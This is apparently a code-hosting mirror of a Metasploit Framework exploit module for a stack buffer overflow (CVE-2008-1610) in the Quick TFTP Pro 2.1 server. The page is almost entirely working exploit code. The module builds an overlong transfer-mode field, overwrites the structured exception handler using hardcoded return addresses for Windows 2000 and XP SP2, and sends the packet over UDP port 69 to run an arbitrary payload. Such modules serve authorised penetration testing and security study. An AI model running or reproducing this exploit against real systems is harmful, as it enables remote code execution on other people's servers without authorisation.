Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Udp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Quick FTP Pro 2.1 Transfer-Mode Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the Quick TFTP Pro server

19
          product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting

20
          in a DoS.  This is a port of a sploit by Mati "muts" Aharoni.

21
        },

22
        'Author' => 'Saint Patrick',

23
        'References' => [

24
          ['CVE', '2008-1610'],

25
          ['OSVDB', '43784'],

26
          ['BID', '28459'],

27
          ['URL', 'http://web.archive.org/web/20080330000001/http://secunia.com:80/advisories/29494/'],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
        },

32
        'Payload' => {

33
          'Space' => 460,

34
          'BadChars' => "\x00\x20\x0a\x0d",

35
          'StackAdjustment' => -3500,

36
        },

37
        'Platform' => 'win',

38
        'Targets' => [

39
          ['Windows Server 2000', { 'Ret' => 0x75022AC4 } ], # ws2help.dll

40
          ['Windows XP SP2', { 'Ret' => 0x74D31458 } ], # oledlg.dll

41
        ],

42
        'DefaultTarget' => 1,

43
        'DisclosureDate' => '2008-03-27',

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        Opt::RPORT(69)

55
      ]

56
    )

57
  end

58


59
  def exploit

60
    connect_udp

61


62
    print_status("Trying target #{target.name}...")

63


64
    sploit = "\x00\x02" + rand_text_english(4, payload_badchars) + "\x00"

65
    sploit += "A" * 1019

66
    seh = generate_seh_payload(target.ret)

67
    sploit += seh

68
    sploit += "\x00"

69


70
    udp_sock.put(sploit)

71
    print_status("Done.")

72


73
    handler

74
    disconnect_udp

75
  end

76
end

77


78